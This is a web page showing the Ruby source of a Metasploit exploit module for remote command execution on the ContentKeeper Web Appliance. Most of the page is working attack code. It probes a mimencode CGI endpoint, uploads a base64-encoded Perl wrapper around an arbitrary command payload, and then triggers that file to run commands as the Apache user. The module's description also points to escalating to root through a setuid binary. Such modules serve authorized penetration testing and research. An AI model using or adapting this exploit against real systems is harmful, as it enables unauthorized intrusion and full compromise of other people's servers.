扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | ## # $Id: contentkeeperweb_mimencode.rb 10617 2010-10-09 06:55:52Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'ContentKeeper Web Remote Command Execution', 'Description'=> %q{ This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' to escalate to root. }, 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_CMD ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 10617 $', 'References' => [ [ 'OSVDB', '54551'], [ 'OSVDB', '54552'], [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], ], 'Privileged' => false, 'Payload'=> { 'DisableNops' => true, 'Space' => 1024, 'Compat'=> { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby telnet', } }, 'Platform' => ['unix'], 'Targets'=> [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'Feb 25 2009', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), ],self.class) end def check connect sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n") banner = sock.get(-1,3) disconnect if (banner =~ /500 Internal/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit exp = "#!/usr/bin/perl\n" exp << "print \"Content-type: text/html\\n\\n\"\;\n\n" exp << "system(\"" exp << payload.encoded.gsub('"', '\"') exp << "\");\n" body = Rex::Text.encode_base64(exp) connect sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n" sploit << "Host: #{datastore['RHOST']}\r\n" sploit << "Content-Length: #{body.length}\r\n\r\n" print_status("Uploading payload to target.") sock.put(sploit + body + "\r\n\r\n") disconnect select(nil,nil,nil,5) print_status("Calling payload...") connect req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx req << "Host: #{datastore['RHOST']}\r\n" sock.put(req + "\r\n\r\n") handler disconnect end end |
体验盒子
